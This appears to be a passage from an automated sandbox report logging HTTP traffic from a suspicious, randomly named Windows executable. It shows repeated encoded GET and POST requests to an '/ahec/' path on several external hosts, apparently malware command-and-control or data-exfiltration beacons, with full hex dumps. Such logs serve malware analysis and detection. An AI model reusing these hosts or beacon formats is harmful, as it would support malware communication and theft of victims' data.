                                                                        Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                        Dec 2, 2023 18:51:57.527030945 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                        Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                        Dec 2, 2023 18:51:57.527072906 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                        Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                        Dec 2, 2023 18:51:57.527085066 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                        Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                        Dec 2, 2023 18:51:57.527091980 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                        Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                        Dec 2, 2023 18:51:57.710216045 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                        Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.1049756185.74.252.11805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:58.835238934 CET512OUTGET /ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.altralogos.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:59.549618006 CET541INHTTP/1.1 301 Moved Permanently
                                                                        Date: Sat, 02 Dec 2023 17:51:58 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Location: http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl
                                                                        Content-Length: 0
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.1049757107.178.250.177805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:05.609568119 CET780OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 4f 44 54 79 41 44 41 54 46 53 38 59 58 66 65 39 2b 63 2f 4b 73 69 48 42 65 56 67 76 37 4d 77 37 5a 30 4d 70 75 72 74 46 68 30 50 6e 65 59 6e 66 6c 6c 72 66 57 4b 58 6b 4d 76 6e 6a 38 55 31 77 4e 50 69 45 51 4c 76 67 79 5a 62 52 6c 46 6d 76 48 79 37 64 61 6e 39 78 59 64 2f 77 6b 68 53 46 31 32 64 55 65 67 51 49 4d 54 35 66 73 42 70 51 73 62 57 7a 57 45 2f 4b 42 75 6e 47 4b 63 68 4f 65 66 35 75 70 57 71 72 75 42 73 6c 66 67 6a 44 4c 72 48 66 77 67 58 2f 4f 71 4f 76 52 45 61 51 6a 42 71 36 6e 67 3d 3d
                                                                        Data Ascii: Ot=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHfwgX/OqOvREaQjBq6ng==
                                                                        Dec 2, 2023 18:52:05.896513939 CET230INHTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:52:05.899106979 CET211INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.1049758107.178.250.177805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:08.233582973 CET800OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 34 63 37 65 52 67 70 76 71 74 46 69 30 50 6e 47 6f 6d 58 68 6c 72 45 57 4b 72 73 4d 72 6e 6a 38 56 56 77 4e 50 53 45 52 36 76 68 79 4a 62 54 6a 46 6d 74 44 79 37 64 61 6e 39 78 59 64 37 61 6b 68 4b 46 31 46 56 55 52 69 34 4a 47 7a 35 63 6d 68 70 51 6f 62 57 33 57 45 2b 66 42 76 37 6f 4b 65 70 4f 65 65 6c 75 70 48 71 71 68 42 73 6e 51 41 69 42 4e 70 32 32 79 42 47 46 50 50 75 41 4e 41 4f 4f 69 55 47 70 67 63 4e 4a 39 31 49 31 47 6e 37 73 41 49 66 53 70 79 6b 73 52 42 34 3d
                                                                        Data Ascii: Ot=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ91I1Gn7sAIfSpyksRB4=
                                                                        Dec 2, 2023 18:52:08.520580053 CET380INHTTP/1.1 405 Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:08 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.1049759107.178.250.177805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:10.858983994 CET1813OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.77moea.top
                                                                        Origin: http://www.77moea.top
                                                                        Referer: http://www.77moea.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 35 49 37 65 6a 6f 70 75 4e 78 46 6a 30 50 6e 4c 49 6d 57 68 6c 71 55 57 4f 48 67 4d 72 6a 7a 38 51 52 77 4d 73 61 45 57 50 50 68 34 4a 62 54 76 6c 6d 73 48 79 36 46 61 6e 74 31 59 63 4c 61 6b 68 4b 46 31 45 6c 55 56 77 51 4a 41 7a 35 66 73 42 70 55 73 62 57 50 57 41 71 50 42 76 50 57 4b 76 4a 4f 65 2b 31 75 73 31 79 71 2b 78 73 70 54 41 69 6a 4e 70 36 74 79 46 6e 38 50 4c 76 72 4e 43 75 4f 6e 44 7a 45 34 2f 4a 4e 6d 6d 38 43 5a 6c 76 61 51 2f 75 56 78 53 6b 63 48 52 41 73 63 5a 6f 59 34 70 37 53 79 43 42 67 39 45 39 78 56 76 41 50 7a 63 64 53 68 53 6e 6d 55 6f 4c 45 70 61 69 4d 2f 6e 2f 57 47 53 2b 34 6e 41 75 56 56 7a 61 64 43 71 54 64 70 45 42 6b 52 67 74 65 63 78 57 78 56 54 30 61 31 51 36 67 70 66 41 6a 38 33 4f 67 38 4d 50 79 76 6f 6c 59 6f 56 39 30 45 37 65 74 68 36 64 56 64 62 2f 49 65 56 73 74 58 78 38 5a 5a 71 57 67 52 33 79 68 64 6c 39 79 78 7a 66 55 4e 4d 4a 4d 2f 75 39 65 6c 65 44 54 50 77 75 68 32 6f 74 44 67 53 52 43 36 31 75 72 47 33 47 70 74 67 71 6b 5a 73 76 6a 4d 65 4a 6e 77 50 44 4c 6f 61 51 41 43 58 49 64 39 63 76 52 33 61 73 6e 6d 51 74 47 69 49 6b 49 35 4f 79 55 34 64 6f 61 34 4a 4c 54 44 61 55 2b 54 42 30 38 44 74 66 52 55 65 31 61 53 7a 54 49 2f 4b 6f 38 46 5a 51 77 4e 4f 37 47 66 38 36 6d 2f 54 56 2b 30 54 31 53 57 4f 62 35 79 4c 51 34 36 71 31 68 4e 31 62 6a 37 63 45 2f 6c 48 4f 70 63 76 4b 7a 7a 4b 38 4a 36 7a 4f 39 73 79 52 4b 65 2f 6b 54 49 46 4e 5a 6d 77 63 2f 52 70 47 31 2f 61 45 79 4d 62 6c 32 43 69 33 6d 32 6f 71 6f 50 74 79 2f 56 4c 46 77 48 74 6e 4c 57 65 59 42 42 67 6f 30 45 37 7a 33 31 46 63 48 6d 59 52 48 58 4f 4a 43 53 6b 34 6e 62 76 33 6b 4c 38 37 6c 64 5a 53 54 37 33 52 4e 74 54 55 6d 53 56 75 6c 4d 73 63 57 61 4a 65 41 69 7a 73 52 34 68 4b 75 6c 66 53 37 4f 58 74 42 31 78 63 46 6f 6a 50 46 34 77 6a 6d 61 43 58 44 2b 6e 4c 50 7a 32 34 2b 71 2f 7a 49 59 6b 68 58 7a 6e 78 71 30 78 59 62 48 71 30 36 59 50 32 75 57 65 65 75 33 35 74 59 31 69 68 78 77 32 7a 58 63 35 2f 2b 31 74 73 55 39 79 33 4b 56 4c 34 70 4a 41 78 69 75 57 38 6f 35 6f 70 71 45 6e 61 77 76 72 41 52 78 6c 51 6e 49 66 39 68 4b 76 4f 38 50 69 59 31 52 74 66 35 61 51 39 6a 5a 6a 5a 52 44 49 31 65 64 4a 52 32 6e 75 4e 49 71 44 36 6b 46 4a 5a 43 76 54 45 6c 78 6a 32 4c 50 35 4b 6d 50 39 37 48 44 55 44 69 47 67 31 4d 74 39 53 45 65 4f 74 42 51 58 66 61 4a 6b 39 75 61 78 6b 56 4e 42 62 34 5a 6f 2b 41 64 31 39 52 4f 4b 67 7a 54 63 4d 32 79 6c 4b 31 54 54 53 5a 37 6e 71 2f 57 55 4d 47 6f 58 55 79 52 41 2f 6e 6c 6b 4b 54 4b 67 77 58 33 4e 68 66 52 69 33 67 50 75 52 71 77 53 6c 41 61 4e 69 4e 78 6e 34 73 48 59 30 35 62 76 62 77 42 4a 68 4a 2f 55 49 62 2f 4e 7a 49 31 72 4d 78 68 36 56 64 58 5a 37 58 30 76 31 41 51 47 78 76 63 38 62 47 74 46 7a 74 53 2b 49 34 7a 62 45 47 2f 66 36 37 6a 4f 38 48 7a 55 4f 6a 78 58 49 48 35 61 30 76 65 57 70 49 7a 6a 31 53 51 36 45 55 35 49 48 79 53 65 32 79 70 61 57 4c 75 39 50 41 6c 53 6c 58 58 61 4a 7a 39 33 61 37 58 4d 64 4c 55 64 52 7a 30 44 55 34 77 39 43 6f 39 54 46 45 45 32 39 6b 62 41 71 6c 41 65 54 57 2b 6a 4a 35 47 54 58 47 2f 63 63 72 41 67 6a 46 57 46 43 34 2f 72 77 67 36 72 71 54 4d 77 69 79 6b 41 57 54 2b 6e 6b 49 5a 7a 4a 70 47 37 45 45 54 71 59 47 78 51 45 6a 52 66 54 66 6e 75 63 4c 78 76 67 5a 46 6a 61 67 56 35 2f 78 77 6a 32 59 43 37 72 68 32 31 55 39 6b 53 4b 6f 4a 75 66 5a 46 41 65 76 50 43 76 68 63 36 74 4b 56 33 4c 48 78 45 54 47 52 4b 57 6c 37 56 2b 6c 57 45 69 44 31 4c 33 72 76 6e 4f 67 2f 4b 4e 48 50 70 31 51 38 46 49 53 72 4f 43 66 7a 48 58 36 30 4b 59 37 48 4e 5a 42 31 44 4f 32 66 33 75 2f 6b 51 6d 44
                                                                        Data Ascii: Ot=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq65I7ejopuNxFj0PnLImWhlqUWOHgMrjz8QRwMsaEWPPh4JbTvlmsHy6Fant1YcLakhKF1ElUVwQJAz5fsBpUsbWPWAqPBvPWKvJOe+1us1yq+xspTAijNp6tyFn8PLvrNCuOnDzE4/JNmm8CZlvaQ/uVxSkcHRAscZoY4p7SyCBg9E9xVvAPzcdShSnmUoLEpaiM/n/WGS+4nAuVVzadCqTdpEBkRgtecxWxVT0a1Q6gpfAj83Og8MPyvolYoV90E7eth6dVdb/IeVstXx8ZZqWgR3yhdl9yxzfUNMJM/u9eleDTPwuh2otDgSRC61urG3GptgqkZsvjMeJnwPDLoaQACXId9cvR3asnmQtGiIkI5OyU4doa4JLTDaU+TB08DtfRUe1aSzTI/Ko8FZQwNO7Gf86m/TV+0T1SWOb5yLQ46q1hN1bj7cE/lHOpcvKzzK8J6zO9syRKe/kTIFNZmwc/RpG1/aEyMbl2Ci3m2oqoPty/VLFwHtnLWeYBBgo0E7z31FcHmYRHXOJCSk4nbv3kL87ldZST73RNtTUmSVulMscWaJeAizsR4hKulfS7OXtB1xcFojPF4wjmaCXD+nLPz24+q/zIYkhXznxq0xYbHq06YP2uWeeu35tY1ihxw2zXc5/+1tsU9y3KVL4pJAxiuW8o5opqEnawvrARxlQnIf9hKvO8PiY1Rtf5aQ9jZjZRDI1edJR2nuNIqD6kFJZCvTElxj2LP5KmP97HDUDiGg1Mt9SEeOtBQXfaJk9uaxkVNBb4Zo+Ad19ROKgzTcM2ylK1TTSZ7nq/WUMGoXUyRA/nlkKTKgwX3NhfRi3gPuRqwSlAaNiNxn4sHY05bvbwBJhJ/UIb/NzI1rMxh6VdXZ7X0v1AQGxvc8bGtFztS+I4zbEG/f67jO8HzUOjxXIH5a0veWpIzj1SQ6EU5IHySe2ypaWLu9PAlSlXXaJz93a7XMdLUdRz0DU4w9Co9TFEE29kbAqlAeTW+jJ5GTXG/ccrAgjFWFC4/rwg6rqTMwiykAWT+nkIZzJpG7EETqYGxQEjRfTfnucLxvgZFjagV5/xwj2YC7rh21U9kSKoJufZFAevPCvhc6tKV3LHxETGRKWl7V+lWEiD1L3rvnOg/KNHPp1Q8FISrOCfzHX60KY7HNZB1DO2f3u/kQmD
                                                                        Dec 2, 2023 18:52:11.152064085 CET380INHTTP/1.1 405 Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.1049760107.178.250.177805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:13.483058929 CET508OUTGET /ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.77moea.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:52:13.770286083 CET354INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:13 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 5208
                                                                        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                        Vary: Accept-Encoding
                                                                        ETag: "65267254-1458"
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:52:13.782613039 CET1340INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                        Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                        Dec 2, 2023 18:52:13.782635927 CET1340INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                        Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                        Dec 2, 2023 18:52:13.782654047 CET1340INData Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c
                                                                        Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                        Dec 2, 2023 18:52:13.782672882 CET1340INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74
                                                                        Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                        Dec 2, 2023 18:52:13.782689095 CET118INData Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.104976137.97.254.27805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:52:21.326864004 CET807OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.wrautomotive.online
                                                                        Origin: http://www.wrautomotive.online
                                                                        Referer: http://www.wrautomotive.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 30 67 49 6a 4b 6e 4b 32 42 4a 74 65 76 48 4b 5a 43 67 74 53 31 73 4d 79 79 56 56 48 30 76 79 36 36 4c 48 74 38 57 2f 56 34 57 4c 6c 46 2f 61 51 66 47 32 6e 4b 42 58 46 39 45 73 39 45 56 59 2b 43 64 45 6f 54 4b 67 63 53 32 48 46 33 4b 32 76 73 4e 50 78 36 59 4c 73 46 6e 73 6b 69 4d 4a 73 5a 68 74 5a 4f 64 44 44 35 6d 79 4e 4b 38 4b 72 6d 39 53 49 55 52 73 76 5a 4f 6c 74 4f 6b 7a 77 6b 47 4c 38 55 42 6f 56 51 79 7a 34 48 57 63 7a 51 4d 6c 61 52 4b 69 52 79 6e 7a 77 2f 72 48 32 79 4b 4e 58 66 44 70 69 37 2f 6c 78 46 30 42 59 50 51 3d 3d
